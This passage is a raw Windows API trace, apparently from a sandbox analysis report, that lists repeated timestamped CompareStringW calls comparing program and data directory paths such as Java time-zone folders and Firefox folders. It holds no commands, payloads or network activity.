(Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount2=51) returned 3 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount2=51) returned 1 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount2=51) returned 2 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount2=48) returned 1 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=74, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount2=48) returned 3 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount2=48) returned 1 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount2=48) returned 2 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\", cchCount2=33) returned 3 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\", cchCount2=33) returned 3 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\", cchCount1=40, lpString2="C:\\Program Files (x86)\\Java\\jre7\\", cchCount2=33) returned 3 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\", cchCount1=33, lpString2="C:\\Program Files (x86)\\Java\\jre7\\", cchCount2=33) returned 2 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\", cchCount1=47, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=74, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\", cchCount1=97, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0139.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\", cchCount1=52, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Microsoft Help\\", cchCount1=30, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=74) returned 1 [0139.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=74) returned 3 [0139.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=74) returned 1 [0139.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=74, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=74) returned 2 [0139.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", cchCount2=110) returned 1 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", cchCount2=110) returned 1 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\", cchCount1=52, lpString2="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", cchCount2=110) returned 1 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Microsoft Help\\", cchCount1=30, lpString2="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", cchCount2=110) returned 1 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", cchCount2=110) returned 1 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 3 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount2=48) returned 2 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 3 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 1 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\", cchCount2=45) returned 2 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\", cchCount1=47, lpString2="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0139.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\", cchCount1=97, lpString2="C:\\ProgramData\\Package 